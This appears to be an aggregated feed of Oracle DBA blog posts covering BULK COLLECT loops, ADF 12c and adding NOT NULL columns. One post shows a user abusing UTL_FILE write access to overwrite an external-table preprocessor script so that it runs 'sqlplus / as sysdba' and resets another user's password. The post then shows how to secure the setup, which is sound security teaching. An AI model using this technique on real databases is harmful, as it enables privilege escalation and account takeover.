 16      l_str := 'validate backupset '||RTRIM(l_str,',')||';';
 17      dbms_output.put_line(l_str);
 18      EXIT WHEN c_level1%NOTFOUND;
 19    END LOOP;
 20    CLOSE c_level1;
 21  EXCEPTION
 22    WHEN others THEN RAISE;
 23* END;
validate backupset 609,610,611,612,613,614;

PL/SQL procedure successfully completed.

But what happens where there are ZERO rows in the table?

ARROW:(MDINH@db01):PRIMARY> delete from t;

6 rows deleted.

ARROW:(MDINH@db01):PRIMARY> 
ARROW:(MDINH@db01):PRIMARY> r
  1  DECLARE
  2    CURSOR c_level1 IS
  3      SELECT recid FROM t WHERE incremental_level > 0;
  4    TYPE t_level1 IS
  5      TABLE OF c_level1%ROWTYPE INDEX BY PLS_INTEGER;
  6    l_level1 t_level1;
  7    l_str VARCHAR2(1000);
  8  BEGIN
  9    OPEN c_level1;
 10    LOOP
 11      FETCH c_level1 BULK COLLECT INTO l_level1 LIMIT 8;
 12      FOR i IN 1..l_level1.COUNT
 13      LOOP
 14        l_str := l_str||l_level1(i).recid||',';
 15      END LOOP;
 16      l_str := 'validate backupset '||RTRIM(l_str,',')||';';
 17      dbms_output.put_line(l_str);
 18      EXIT WHEN c_level1%NOTFOUND;
 19    END LOOP;
 20    CLOSE c_level1;
 21  EXCEPTION
 22    WHEN others THEN RAISE;
 23* END;
validate backupset ;

PL/SQL procedure successfully completed.

ARROW:(MDINH@db01):PRIMARY>

Error! I was doing something fundamentally wrong.

Finally, I figured it out. Use COUNT=0 versus %NOTFOUND;

ARROW:(MDINH@db01):PRIMARY> r
  1  DECLARE
  2    CURSOR c_level1 IS
  3      SELECT recid FROM t WHERE incremental_level > 0;
  4    TYPE t_level1 IS
  5      TABLE OF c_level1%ROWTYPE INDEX BY PLS_INTEGER;
  6    l_level1 t_level1;
  7    l_str VARCHAR2(1000);
  8  BEGIN
  9    OPEN c_level1;
 10    LOOP
 11      FETCH c_level1 BULK COLLECT INTO l_level1 LIMIT 8;
 12      FOR i IN 1..l_level1.COUNT
 13      LOOP
 14        l_str := l_str||l_level1(i).recid||',';
 15      END LOOP;
 16      EXIT WHEN l_level1.COUNT=0;
 17      l_str := 'validate backupsets '||RTRIM(l_str,',')||';';
 18      dbms_output.put_line(l_str);
 19    END LOOP;
 20    CLOSE c_level1;
 21  EXCEPTION
 22    WHEN others THEN RAISE;
 23* END;
validate backupset 609,610,611,612,613,614;

PL/SQL procedure successfully completed.

ARROW:(MDINH@db01):PRIMARY> delete from t;

6 rows deleted.

ARROW:(MDINH@db01):PRIMARY> 
ARROW:(MDINH@db01):PRIMARY> r
  1  DECLARE
  2    CURSOR c_level1 IS
  3      SELECT recid FROM t WHERE incremental_level > 0;
  4    TYPE t_level1 IS
  5      TABLE OF c_level1%ROWTYPE INDEX BY PLS_INTEGER;
  6    l_level1 t_level1;
  7    l_str VARCHAR2(1000);
  8  BEGIN
  9    OPEN c_level1;
 10    LOOP
 11      FETCH c_level1 BULK COLLECT INTO l_level1 LIMIT 8;
 12      FOR i IN 1..l_level1.COUNT
 13      LOOP
 14        l_str := l_str||l_level1(i).recid||',';
 15      END LOOP;
 16      EXIT WHEN l_level1.COUNT=0;
 17      l_str := 'validate backupset '||RTRIM(l_str,',')||';';
 18      dbms_output.put_line(l_str);
 19      END LOOP;
 20    CLOSE c_level1;
 21  EXCEPTION
 22    WHEN others THEN RAISE;
 23* END;

PL/SQL procedure successfully completed.

I knew the article Best practices for knowing your LIMIT and kicking %NOTFOUND by Steven Feuerstein existed, but was not able to find it at the time.

One more thing to leave you with before I go. Bulk Collect will NEVER raise a NO_DATA_FOUND exception.


Don’t use %NOTFOUND with BULK COLLECT

Michael Dinh - Sun, 2014-04-13 16:54

I was working on a script for the ultimate RMAN backup validation and hoping to submit the article for an Oracle conference.

To my chagrin, one version of the script was failing for one condition and the other version would failed for another condition.

Basically, the script was very buggy.

The objective is to create a RMAN script to validate 8 backupset at a time.

I decided to use Bulk Collect and Limit clause.

Currently there are only 6 backupset.

ARROW:(MDINH@db01):PRIMARY> create table t as SELECT * FROM V$BACKUP_SET WHERE incremental_level > 0;

Table created.

ARROW:(MDINH@db01):PRIMARY> select recid from t;

     RECID
----------
       609
       610
       611
       612
       613
       614

6 rows selected.

ARROW:(MDINH@db01):PRIMARY>

Using LIMIT 8 with only 6 records would result in ZERO records returned.

ARROW:(MDINH@db01):PRIMARY> r
  1  DECLARE
  2    CURSOR c_level1 IS
  3      SELECT recid FROM t WHERE incremental_level > 0;
  4    TYPE t_level1 IS
  5      TABLE OF c_level1%ROWTYPE INDEX BY PLS_INTEGER;
  6    l_level1 t_level1;
  7    l_str VARCHAR2(1000);
  8  BEGIN
  9    OPEN c_level1;
 10    LOOP
 11      FETCH c_level1 BULK COLLECT INTO l_level1 LIMIT 8;
 12      FOR i IN 1..l_level1.COUNT
 13      LOOP
 14        l_str := l_str||l_level1(i).recid||',';
 15      END LOOP;
 16      EXIT WHEN c_level1%NOTFOUND;
 17      l_str := 'validate backupset '||RTRIM(l_str,',')||';';
 18      dbms_output.put_line(l_str);
 19    END LOOP;
 20    CLOSE c_level1;
 21  EXCEPTION
 22    WHEN others THEN RAISE;
 23* END;

PL/SQL procedure successfully completed.

Why not output the results before EXIT WHEN clause?  Works just fine.

ARROW:(MDINH@db01):PRIMARY> r
  1  DECLARE
  2    CURSOR c_level1 IS
  3      SELECT recid FROM t WHERE incremental_level > 0;
  4    TYPE t_level1 IS
  5      TABLE OF c_level1%ROWTYPE INDEX BY PLS_INTEGER;
  6    l_level1 t_level1;
  7    l_str VARCHAR2(1000);
  8  BEGIN
  9    OPEN c_level1;
 10    LOOP
 11      FETCH c_level1 BULK COLLECT INTO l_level1 LIMIT 8;
 12      FOR i IN 1..l_level1.COUNT
 13      LOOP
 14        l_str := l_str||l_level1(i).recid||',';
 15      END LOOP;
 16      l_str := 'validate backupset '||RTRIM(l_str,',')||';';
 17      dbms_output.put_line(l_str);
 18      EXIT WHEN c_level1%NOTFOUND;
 19    END LOOP;
 20    CLOSE c_level1;
 21  EXCEPTION
 22    WHEN others THEN RAISE;
 23* END;
validate backupset 609,610,611,612,613,614;

PL/SQL procedure successfully completed.

But what happens where there are ZERO rows in the table?

ARROW:(MDINH@db01):PRIMARY> delete from t;

6 rows deleted.

ARROW:(MDINH@db01):PRIMARY> 
ARROW:(MDINH@db01):PRIMARY> r
  1  DECLARE
  2    CURSOR c_level1 IS
  3      SELECT recid FROM t WHERE incremental_level > 0;
  4    TYPE t_level1 IS
  5      TABLE OF c_level1%ROWTYPE INDEX BY PLS_INTEGER;
  6    l_level1 t_level1;
  7    l_str VARCHAR2(1000);
  8  BEGIN
  9    OPEN c_level1;
 10    LOOP
 11      FETCH c_level1 BULK COLLECT INTO l_level1 LIMIT 8;
 12      FOR i IN 1..l_level1.COUNT
 13      LOOP
 14        l_str := l_str||l_level1(i).recid||',';
 15      END LOOP;
 16      l_str := 'validate backupset '||RTRIM(l_str,',')||';';
 17      dbms_output.put_line(l_str);
 18      EXIT WHEN c_level1%NOTFOUND;
 19    END LOOP;
 20    CLOSE c_level1;
 21  EXCEPTION
 22    WHEN others THEN RAISE;
 23* END;
validate backupset ;

PL/SQL procedure successfully completed.

ARROW:(MDINH@db01):PRIMARY>

Error! I was doing something fundamentally wrong.

Finally, I figured it out. Use COUNT=0 versus %NOTFOUND;

ARROW:(MDINH@db01):PRIMARY> r
  1  DECLARE
  2    CURSOR c_level1 IS
  3      SELECT recid FROM t WHERE incremental_level > 0;
  4    TYPE t_level1 IS
  5      TABLE OF c_level1%ROWTYPE INDEX BY PLS_INTEGER;
  6    l_level1 t_level1;
  7    l_str VARCHAR2(1000);
  8  BEGIN
  9    OPEN c_level1;
 10    LOOP
 11      FETCH c_level1 BULK COLLECT INTO l_level1 LIMIT 8;
 12      FOR i IN 1..l_level1.COUNT
 13      LOOP
 14        l_str := l_str||l_level1(i).recid||',';
 15      END LOOP;
 16      EXIT WHEN l_level1.COUNT=0;
 17      l_str := 'validate backupsets '||RTRIM(l_str,',')||';';
 18      dbms_output.put_line(l_str);
 19    END LOOP;
 20    CLOSE c_level1;
 21  EXCEPTION
 22    WHEN others THEN RAISE;
 23* END;
validate backupset 609,610,611,612,613,614;

PL/SQL procedure successfully completed.

ARROW:(MDINH@db01):PRIMARY> delete from t;

6 rows deleted.

ARROW:(MDINH@db01):PRIMARY> 
ARROW:(MDINH@db01):PRIMARY> r
  1  DECLARE
  2    CURSOR c_level1 IS
  3      SELECT recid FROM t WHERE incremental_level > 0;
  4    TYPE t_level1 IS
  5      TABLE OF c_level1%ROWTYPE INDEX BY PLS_INTEGER;
  6    l_level1 t_level1;
  7    l_str VARCHAR2(1000);
  8  BEGIN
  9    OPEN c_level1;
 10    LOOP
 11      FETCH c_level1 BULK COLLECT INTO l_level1 LIMIT 8;
 12      FOR i IN 1..l_level1.COUNT
 13      LOOP
 14        l_str := l_str||l_level1(i).recid||',';
 15      END LOOP;
 16      EXIT WHEN l_level1.COUNT=0;
 17      l_str := 'validate backupset '||RTRIM(l_str,',')||';';
 18      dbms_output.put_line(l_str);
 19      END LOOP;
 20    CLOSE c_level1;
 21  EXCEPTION
 22    WHEN others THEN RAISE;
 23* END;

PL/SQL procedure successfully completed.

I knew the article Best practices for knowing your LIMIT and kicking %NOTFOUND by Steven Feuerstein existed, but was not able to find it at the time.

One more thing to leave you with before I go. Bulk Collect will NEVER raise a NO_DATA_FOUND exception.


From Las Vegas to Ottawa

Pakistan's First Oracle Blog - Sun, 2014-04-13 05:27
After a very engaging session at Collaborate14 in sunny Las Vegas amidst the desert of Nevada, I just arrived in not-so-bitterly cold Ottawa, the capital of Canada. Looking forward meeting with various Pythian colleagues and hanging out with the friends I cherish most.

My Exadata IORM session went well. Lots of follow back discussion plus questions are still pouring in. I promise I will answer them as soon as I return to Australia after couple of weeks. That reminds me of my flight from one corner of the globe to the other, but well I need to learn as how to sleep like a baby during flights. Any ideas?

Ottawa reminds me of Australian capital Canberra. It's quite a change after neon-city Vegas. Where Vegas was bathing in lights, simmering with shows, bubbling with bars, swarming with party-goers, and rattling with Casinos; Ottawa is laid-back, quiet, peaceful, and small. Restaurants and cafes look cool. Ottawa River is mostly still frozen and mounds of snow are evident along the road sides with leafless trees.

But spring is here, and things look all set to rock.
Categories: DBA Blogs

ADF Query Design Revisited with ADF 12c Panel Drawer

Andrejus Baranovski - Sat, 2014-04-12 12:22
My goal of this post is to take a closer look into ADF 12c and check how ADF Query layout can be optimised, using Panel Drawer component. There are several items, sample application is focusing on:

1. Panel Drawer component in ADF 12c and its usage for ADF Query

2. Declarative mode support for VO Query optimisation

3. Dynamic bindings in Page Definition for ADF Query

4. View Object query logging

Here you can download sample application - ADFQueryPreviewApp.zip. This is how UI looks initially, when Employees fragment is opened:


You should notice magnifying glass icon on the top right, this is rendered by ADF 12c Panel Drawer component. User could click on this icon and ADF Query would slide and become available, click on the same magnifying glass or anywhere else on the page - it will slide out automatically. This is really convenient, as it allows to save space on the screen - ADF Query is rendered on top of other components in a drawer:


Obviously, you could have as many panel drawers as you would prefer - this is not only for ADF Query. So, as you can see in the screenshot above, search is executed. There are only three columns in the results table - SQL query is generated accordingly with a key and the attributes for these three columns. This is a feature provided by VO declarative mode:


Move to the second accordion group and search for different value - this group displays more columns:


SQL query is different as well - it includes now all visible attributes. Such search implementation is especially useful for the cases, where many attributes must be displayed in the result set. It makes sense first to display result set with several attributes only and give user an option to see all the attributes using additional table. This would mean, initially SQL query would be lighter and it would fetch all attributes later, as in this example:


Let's check now technical details. VO is set to run in declarative mode and all the attributes (except primary key) are marked with Selected in Query = false. This allows to calculate displayed attributes on runtime, based on ADF bindings and construct SQL query accordingly:


There is one hidden gem in the sample application - generic class to provide detail logging for executed SQL queries and rows fetched. You could use it immediately in your project, without any change:


ADF Query is integrated into Panel Drawer using regular ADF Faces Show Detail Item component, there is custom magnifying glass image set:


Each accordion item, where results are displayed, is set with disclosure listener - this is needed to update current context and apply ADF Query to filter results either in Preview or Complete accordion items:


Accordion item is configured with JSF attribute, to identify itself:


Accordion item disclosure listener is updating currently opened item index, this will be used in ADF bindings - to map dynamically ADF Query binding with proper results iterator:


ADF Query in ADF Bindings is represented by Search Region. Unfortunately, Search Region property Binds doesn't work with dynamic expression. I resolved this with one trick - have defined new iterator, where Binds property is calculated dynamically (using current accordion item index). Search Region points to this this artificial iterator, and iterator in turn points to the VO instance. Both results tables are pointing two the same VO instances:


You can spot attribute definitions in the table bindings - VO declarative mode decides which attributes to include into SQL query, based on these attribute bindings defined.

Oracle External Table Pre-processing – Soccer Super-Powers and Trojan Horses

The Anti-Kyte - Sat, 2014-04-12 08:41

The end of the European Football season is coming into view.
In some leagues the battle for the title, or against relegation is reaching a peak of intensity.
Nails are being bitten throughout the continent…unless you are a fan of one of those teams who are running away with their League – Bayern Munich, Juventus, Celtic…Luton Town.
In their fifth season since relegation from the Football League to the Conference, Luton are sitting pretty in the sole automatic promotion place.
Simon is desparately attempting to balance his “lucky” Christmas-cracker moustache until promotion is mathematically certain. Personally, I think that this is taking the concept of keeping a stiff upper-lip to extremes.

"I'll shave it off when we're definitely up !"

“I’ll shave it off when we’re definitely up !”

With the aid of a recent Conference League Table, I’m going to explore the Preprocessor feature of External Tables.
We’ll start with a simple example of how data in an External Table can be processed via a shell script at runtime before the results are then presented to the database user.
We’ll then demonstrate that there are exceptions to the rule that “Simple is Best” by driving a coach and Trojan Horses through the security hole we’ve just opened up.
Finally, in desperation, we’ll have a read of the manual and implement a more secure version of our application.

So, without further ado…

External (league) Table Preprocessing

We have the league table in a csv called conference_table.csv :

Team, Played, Points, Goal Difference
luton town,32,55,72
cambridge utd,31,25,58
barnet,34,11,57
alfreton town,33,0,57
salisbury city,33,0,53
nuneaton town,34,-4,53
gateshead,34,7,51
kidderminster harriers,32,4,50
grimsby town,29,13,49
halifax town,34,10,48
macclesfield town,31,6,47
welling united,32,6,46
forest green,30,14,44
wrexham,33,0,43
lincoln city,34,-4,43
braintree town,27,9,42
woking,34,-11,42
hereford united,33,-11,39
chester,33,-17,35
southport,33,-20,34
aldershot town,32,5,33
dartford,34,-19,33
tamworth,32,-21,29
hyde,34,-58,9

In order to load this data into an External Table, we’ll need a Directory Object in the database that points to an OS directory where this file is located.
In this case, we have a Directory Object called MY_FILES which has been created thus :

CREATE OR REPLACE DIRECTORY my_files AS
    '/u01/app/oracle/my_files'
/

If we now want to access the data in this file, we simply need to copy it to the OS directory pointed to by our Directory Object, make sure that the ORACLE os user can read the file, and then point an external table at it.
So…

cp conference_table.csv /u01/app/oracle/myfiles/.
chmod a+r conference_table.csv

Just to check :


ls -l conference_table.csv

-rw-r--r-- 1 mike   mike     571 Mar 27 13:20 conference_table.csv

As you can see, whilst oracle does not own this file it will have read access to it, as will any other OS user.

And as for our common-or-garden External Table :

CREATE TABLE conference_tab_xt
(
    team varchar2(50),
    played number(2),
    goal_difference number(4),
    points number(3)
)
    ORGANIZATION EXTERNAL
    (
        TYPE oracle_loader
        DEFAULT DIRECTORY my_files
        ACCESS PARAMETERS
        (
            RECORDS DELIMITED BY NEWLINE
            SKIP 1
            FIELDS TERMINATED BY ','
            (
                team char(50),
                played integer external(2),
                goal_difference integer external(4),
                points integer external(2)
            )
        )
            LOCATION('conference_table.csv')
    )
REJECT LIMIT UNLIMITED
/

Using this, we can now see just who is top of the pile in the Conference…

SELECT team
FROM mike.conference_tab_xt
WHERE points = ( SELECT MAX(points) FROM conference_tab_xt)
/

TEAM
--------------------------------------------------
luton town

SQL> 

So far, so good. However, say we wanted to ensure that all of the team names were in upper case when they were loaded into the database ?
OK, this is a fairly trivial requirement, but it does give me the excuse to knock up a simple demonstration of how to implement a Preprocessor for this file.

The shell script to achieve this is relatively simple. If we were just going to run it from the OS, it would look something like this :

#!/bin/sh
cat $1 |tr '[:lower:]' '[:upper:]'

The argument passed into the script is the name of the csv file.
In order to make this script suitable for our purposes however, we’ll need to modify it a bit.
Bear in mind that both the cat and tr commands are executed based on what’s in the $PATH variable of the session in which the script is running.
As we can’t guarantee that this variable will be set at run time when the script is invoked from the database, we need to fully qualify the path to these executables.
If you need to work out the path to these executables, you can simply run the following at the command line :

$ which cat
/bin/cat
$ which tr
/usr/bin/tr

Now we can amend the script to read :

#!/bin/bash
/bin/cat $1|/usr/bin/tr '[:lower:]' '[:upper:]'

I’ve created this file as the oracle os user and saved it into the same directory as the csv file.
What could possibly go wrong ? We’ll come back to that in a bit.

For now, all we need to do is to make the file executable :

chmod u+x toupper.sh
ls -l toupper.sh
-rwxr--r-- 1 oracle dba 58 Apr  7 19:30 toupper.sh

Now, finally, we can re-create our External Table as follows :

DROP TABLE conference_tab_xt
/

CREATE TABLE conference_tab_xt
(
    team varchar2(50),
    played number(2),
    goal_difference number(4),
    points number(3)
)
    ORGANIZATION EXTERNAL
    (
        TYPE oracle_loader
        DEFAULT DIRECTORY my_files
        ACCESS PARAMETERS
        (
            RECORDS DELIMITED BY NEWLINE
            PREPROCESSOR my_files : 'toupper.sh'
            SKIP 1
            FIELDS TERMINATED BY ','
            (
                team char(50),
                played integer external(2),
                goal_difference integer external(4),
                points integer external(2)
            )
        )
            LOCATION('conference_table.csv')
    )
REJECT LIMIT UNLIMITED
/

Seems reasonable. After all, minimizing the number of Directory Objects in the database will also minimize the number of possible entry points for any would be directory based attacks right ? Hmmm.

Anyway, we can now check that the preprocessor does it’s work by re-issuing our query :

SELECT team
FROM mike.conference_tab_xt
WHERE points = ( SELECT MAX(points) FROM mike.conference_tab_xt)
/

TEAM
--------------------------------------------------
LUTON TOWN

Well, that all seems to work perfectly. But is it secure ?

Footballing rivalry in the database

To demonstrate the sort of problems that you could encounter with this External Table as it’s currently defined, we need to return to the land of the Trojan Horse.

Consider two users who need access to the External table we’ve just created.
We’ll call them Achilles and Hector.
If you really want a back-story, Hector is a keen Olympiakos fan, basking in the glory of their runaway lead at the top of the Greek Super League. Achilles supports Panathinaikos and is a bit fed-up with Hector giving it large about how great his team is. The fact that matches between the two teams are referred to as The Derby of the Eternal Enemies adds and extra frisson of tension around the office.

Both of them have the CREATE SESSION privileges and have been granted the DATA_PROCESS_ROLE, which is created as follows :

CREATE ROLE data_process_role
/

GRANT SELECT ON mike.conference_tab_xt TO data_process_role
/

GRANT READ, WRITE, EXECUTE ON DIRECTORY my_files TO data_process_role
/

GRANT EXECUTE ON UTL_FILE TO data_process_role
/

Just in case you want to play along, the two users have been created like this :

CREATE USER hector identified by pwd
/

GRANT CREATE SESSION, data_process_role TO hector
/

CREATE USER achilles identified by pwd
/

GRANT CREATE SESSION, data_process_role TO achilles
/

A point to note here is that the EXECUTE permission on the Directory Object is required for users to be able to access preprocessor program.

Achilles has decided to take Hector down a peg or two by creating a bit of mischief. He’s heard about this external table pre-processing and wonders if he might be able to use it to help him in his plan.

Before he sets about building his Wooden Horse, Achilles does some planning…

Planning the attack

First, Achilles finds out about the privileges he currently has :

SELECT privilege
FROM session_privs;

PRIVILEGE                              
----------------------------------------
CREATE SESSION               

SQL> SELECT owner, table_name, privilege
  2  FROM role_tab_privs
  3  ORDER BY table_name;

OWNER		     TABLE_NAME 	  PRIVILEGE
-------------------- -------------------- --------------------
MIKE		     CONFERENCE_TAB_XT	  SELECT
SYS		     MY_FILES		  EXECUTE
SYS		     MY_FILES		  READ
SYS		     MY_FILES		  WRITE
SYS		     UTL_FILE		  EXECUTE

Looks like the CONFERENCE_TAB_XT might be the type of external table he’s looking for.
He checks this in his IDE ( SQLDeveloper in this case).
Open the object and ask for the source SQL and :

-- Unable to render TABLE DDL for object MIKE.CONFERENCE_TAB_XT with DBMS_METADATA attempting internal generator.
CREATE TABLE MIKE.CONFERENCE_TAB_XT 
(
  TEAM VARCHAR2(50 BYTE) 
, PLAYED NUMBER(2, 0) 
, GOAL_DIFFERENCE NUMBER(4, 0) 
, POINTS NUMBER(3, 0) 
) 
ORGANIZATION EXTERNAL 
( 
  TYPE ORACLE_LOADER 
  DEFAULT DIRECTORY MY_FILES 
  ACCESS PARAMETERS 
  ( 
    RECORDS DELIMITED BY NEWLINE
            PREPROCESSOR MY_FILES : 'toupper.sh'
            SKIP 1
            FIELDS TERMINATED BY ','
            (
                team char(50),
                played integer external(2),
                goal_difference integer external(4),
                points integer external(2)
            ) 
  ) 
  LOCATION 
  ( 
    MY_FILES: 'conference_table.csv' 
  ) 
) 
REJECT LIMIT 0

Now Achilles can see that this is indeed an External Table. The file on which it’s based resides in the MY_FILES directory, hence the READ/WRITE privileges on that directory.
There is also a preprocessor for the table. This also resides in the MY_FILES directory, hence the EXECUTE privilege he’s been granted.

The final step in the planning process is to find out what the toupper.sh script does.
As he’s got READ and WRITE to the Directory, Achilles can do this :

set serveroutput on size unlimited
DECLARE
--
-- Script to read a file from a directory
--
    l_fp UTL_FILE.FILE_TYPE;
    l_buffer VARCHAR2(32767);
BEGIN 
    l_fp := UTL_FILE.FOPEN
    (
        location => 'MY_FILES',
        filename => 'toupper.sh',
        open_mode => 'R'
    );
    --
    -- Now output the contents...
    --
    BEGIN
        LOOP
            UTL_FILE.GET_LINE(l_fp, l_buffer);
            DBMS_OUTPUT.PUT_LINE(l_buffer);
        END LOOP;
    EXCEPTION
        WHEN NO_DATA_FOUND THEN
            NULL;
    END;
END;
/

He saves the code to a file called read_shell_script.sql. When he runs it :

SQL> @read_shell_script.sql
#!/bin/sh
/bin/cat $1|/usr/bin/tr '[:lower:]' '[:upper:]'

PL/SQL procedure successfully completed.

SQL> 
Wheeling the horse to the gates…

Achilles now has all the information required to implement his attack.
At this point, he could do whatever he wanted. Remember, the shell script is executed as the oracle user on the os. The oracle user that owns the database.

What he actually decides to do is…

DECLARE
    l_fp UTL_FILE.FILE_TYPE;
    l_buffer VARCHAR2(32767);
BEGIN 
    l_fp := UTL_FILE.FOPEN
    (
        location => 'MY_FILES',
        filename => 'toupper.sh',
        open_mode => 'W'
    );
    --
    -- Now write the new and "improved" script
    --
    UTL_FILE.PUT_LINE(l_fp, '#!/bin/sh');
    UTL_FILE.PUT_LINE(l_fp, '/u01/app/oracle/product/11.2.0/xe/bin/sqlplus -s / as sysdba <<- END_SCRIPT');
    UTL_FILE.PUT_LINE(l_fp, 'set feedback off');
    UTL_FILE.PUT_LINE(l_fp, 'alter user hector identified by Panathinaikos_no1_nuff_said;');
    UTL_FILE.PUT_LINE(l_fp, 'quit;');
    UTL_FILE.PUT_LINE(l_fp, 'END_SCRIPT');
    UTL_FILE.PUT_LINE(l_fp, '/bin/cat $1|/usr/bin/tr [:lower:] [:upper:]');
    UTL_FILE.FFLUSH(l_fp);
    UTL_FILE.FCLOSE(l_fp);
END;
/

This works as expected. After all, as well as Achilles having write access to the MY_FILES directory object in the database, the oracle user on the OS also has write privileges on the toupper.sh file.
Anyway, once this code has run, the shell script now looks like this :

#!/bin/sh
/u01/app/oracle/product/11.2.0/xe/bin/sqlplus -s / as sysdba <<- END_SCRIPT
set feedback off
alter user hector identified by panathinaikos_1970_nuff_said;
quit;
END_SCRIPT
/bin/cat $1|/usr/bin/tr [:lower:] [:upper:]

Of course, being a Trojan, the program hasn’t done anything yet. Achilles leaves everything as is at the moment.

A short while later, Hector decides to find out how things look at the top of the Conference ( he’s a bit of a European Football geek, truth be told) :

SELECT team, pld, pts, gd
FROM
(
  SELECT team, played as pld, points as pts, goal_difference as gd,
    RANK() OVER( ORDER BY points DESC, goal_difference DESC) as position
    FROM mike.conference_tab_xt
  )
  WHERE position < 6
/

The query works as expected and Hector is none-the-wiser. Next time he goes to login howerver, he gets an unpleasant surprise :

$ sqlplus hector

SQL*Plus: Release 11.2.0.2.0 Production on Thu Apr 10 18:48:03 2014

Copyright (c) 1982, 2011, Oracle.  All rights reserved.

Enter password: 
ERROR:
ORA-01017: invalid username/password; logon denied


Enter user-name: 

After a couple of days of the DBA getting annoyed at Hector because he can’t “remember” his password, Achilles simply changes the script back :

DECLARE
--
-- Script to reset toupper.sh to it's original contents
--
    l_fp UTL_FILE.FILE_TYPE;
    l_buffer VARCHAR2(32767);
BEGIN 
    l_fp := UTL_FILE.FOPEN
    (
        location => 'MY_FILES',
        filename => 'toupper.sh',
        open_mode => 'W'
    );
    UTL_FILE.PUT_LINE(l_fp, '#!/bin/sh');
    UTL_FILE.PUT_LINE(l_fp, '/bin/cat $1|/usr/bin/tr [:lower:] [:upper:]');
    UTL_FILE.FFLUSH(l_fp);
    UTL_FILE.FCLOSE(l_fp);
END;
/
When all else fails – Read the Manual

Clearly the solution we’ve implemented here has one or two issues.
On reflection, it might have been quite a good idea to look at the documentation on the subject of preprocessor security.

From this, we can see that there a number of steps we can take to prevent this sort of attack.

Keeping preprocessors separate from data files

As things stand, our database users have full permissions on the MY_FILES directory object.
However, the EXECUTE privilege is only necessary because they need to execute the preprocessor program.
So, if we created a separate directory object just for the preprocessor, that should solve the problem right ?
Well, it depends.
Remember, there is nothing to stop you having multiple directory objects in the database pointing to a single OS directory.
We want to make sure that it is not possible for our users to write to the preprocessor file from within the database.
To do this, we need an additional Directory Object pointing to a different OS directory.

So, the first step then is to create the OS directory and then a Directory Object in the database that points to it :

sudo su oracle
mkdir /u01/app/oracle/pre_proc_dir

…and the new Directory Object :

CREATE DIRECTORY pre_proc_dir AS
    '/u01/app/oracle/pre_proc_dir'
File permissions on the OS

Once we’ve done this, we can re-create toupper.sh in our new preprocessor OS directory and remove it from it’s original location.
Whilst we’re doing this, it’s probably worth bearing in mind that the oracle OS user only needs execute permissions on the file.
There’s nothing to stop it being owned by a different OS user. So, for example, I could create toupper.sh as mike and do the following :

chmod a+x toupper.sh
ls -l toupper.sh
-rwxr-xr-x 1 mike dba 244 Mar 28 14:19 toupper.sh

Now, whilst the oracle user can still execute (and read) the file, it cannot write to it. So, even if a user has write permissions on the PRE_PROC_DIR directory object in the database, they won’t be able to change the file itself.

The next step is to re-create our External Table to use the new preprocessor location :

DROP TABLE conference_tab_xt
/

CREATE TABLE conference_tab_xt
(
    team varchar2(50),
    played number(2),
    goal_difference number(4),
    points number(3)
)
    ORGANIZATION EXTERNAL
    (
        TYPE oracle_loader
        DEFAULT DIRECTORY my_files
        ACCESS PARAMETERS
        (
            RECORDS DELIMITED BY NEWLINE
            PREPROCESSOR pre_proc_dir : 'toupper.sh'
            SKIP 1
            FIELDS TERMINATED BY ','
            (
                team char(50),
                played integer external(2),
                goal_difference integer external(4),
                points integer external(2)
            )
        )
            LOCATION('conference_table.csv')
    )
REJECT LIMIT UNLIMITED
/
Directory Object grants

Finally, we need to modify the grants to the DATA_PROCESS_ROLE so that users can still access the table :

REVOKE EXECUTE ON DIRECTORY my_files FROM data_process_role
/
GRANT EXECUTE ON DIRECTORY pre_proc_dir TO data_process_role
/
-- re-grant select on the table as we've re-created it...
GRANT SELECT ON mike.conference_tab_xt TO data_process_role
/

Let’s see how (and indeed, whether) these changes prevent this kind of attack.

Achilles’ privileges have changed :

OWNER                          TABLE_NAME                     PRIVILEGE                              
------------------------------ ------------------------------ ----------------------------------------
MIKE                       CONFERENCE_TAB_XT SELECT                              
SYS                         MY_FILES                READ                                
SYS                         MY_FILES                WRITE                               
SYS                         PRE_PROC_DIR       EXECUTE                           
SYS                         UTL_FILE                 EXECUTE                           

Now when he comes to read or write the shell script it’s located in PRE_PROC_DIR, a directory to which he only has EXECUTE privileges. Now, he’ll get :

ORA-29289: directory access denied
ORA-06512: at "SYS.UTL_FILE", line 41
ORA-06512: at "SYS.UTL_FILE", line 478
ORA-06512: at line 10
29289. 00000 -  "directory access denied"
*Cause:    A directory object was specified for which no access is granted.
*Action:   Grant access to the directory object using the command
           GRANT READ ON DIRECTORY [object] TO [username];.
Other points to note

Of course, given a different set of object privileges, it would still be possible for Achilles to cause some mischief by exploiting the External Table preprocessing functionality.
Perhaps the most pertinent privilege here would be CREATE ANY DIRECTORY.
If you have this privilege then you will also have full rights on any Directory that you create. Remember, there is nothing to stop you having multiple Directory Objects that point to a single OS directory.
If Achilles had this privilege, and we had not removed the oracle OS user’s read/write privilege on our preprocessor program, then he could simply have created his own Directory Object in the database and used that to execute the same attack.
The Oracle documentation also mentions some auditing steps that you might consider. In addition to auditing the DROP ANY DIRECTORY privilege, I’d also suggest auditing CREATE ANY DIRECTORY.
I think the other point to note here is that, whilst auditing may serve as a deterrent, it does nothing to actively prevent this kind of thing happening.

As things stand, Luton need only one more win for promotion. Hopefully, Simon’s moustache’s days are strictly numbered.


Filed under: Oracle, PL/SQL, Shell Scripting, SQL Tagged: directory object permissions, external tables, oracle loader, preprocessor, UTL_FILE

adding NOT NULL columns to an existing table ... implications make me grumpy

Grumpy old DBA - Sat, 2014-04-12 07:56
This is DBA basics 101 in the oracle world but well also something that we grumpy DBA types forget from time to time.  We have an existing table in a schema that is populated with data.  Something like this say:


create table dbaperf.has_data ( column_one varchar2(10) not null, column_two number(10) not null);

insert into dbaperf.has_data(column_one, column_two) values('First row',13);
insert into dbaperf.has_data(column_one, column_two) values('Another',42); commit;

Now you need to add another column that is also NOT NULL.  Chris Date not happy the vendor implementations of the relational model allow null columns.  Be aware of any potential NULL columns in rows and handle them carefully ( IS null / IS not null ) to avoid messing up results.

But anyhow we are going to add in a new column that is NOT NULL.

How easy that is to do against an Oracle table depends on whether one is also supplying a DEFAULT value for the new column.  If you do not supply DEFAULT value what happens here?

 alter table dbaperf.has_data add ( column_three char(1) NOT NULL );

You get: ORA-01758: table must be empty to add mandatory (NOT NULL) column

To get around that you have to do this in three steps:
  • Add in the new column
  • Populate all the new columns with a value ( data migration )
  • Make the column NOT NULL
alter table dbaperf.has_data add ( column_three char(1) );

update dbaperf.has_data set column_three = 'X' where column_one = 'First row';
update dbaperf.has_data set column_three = 'X' where column_one = 'Another';

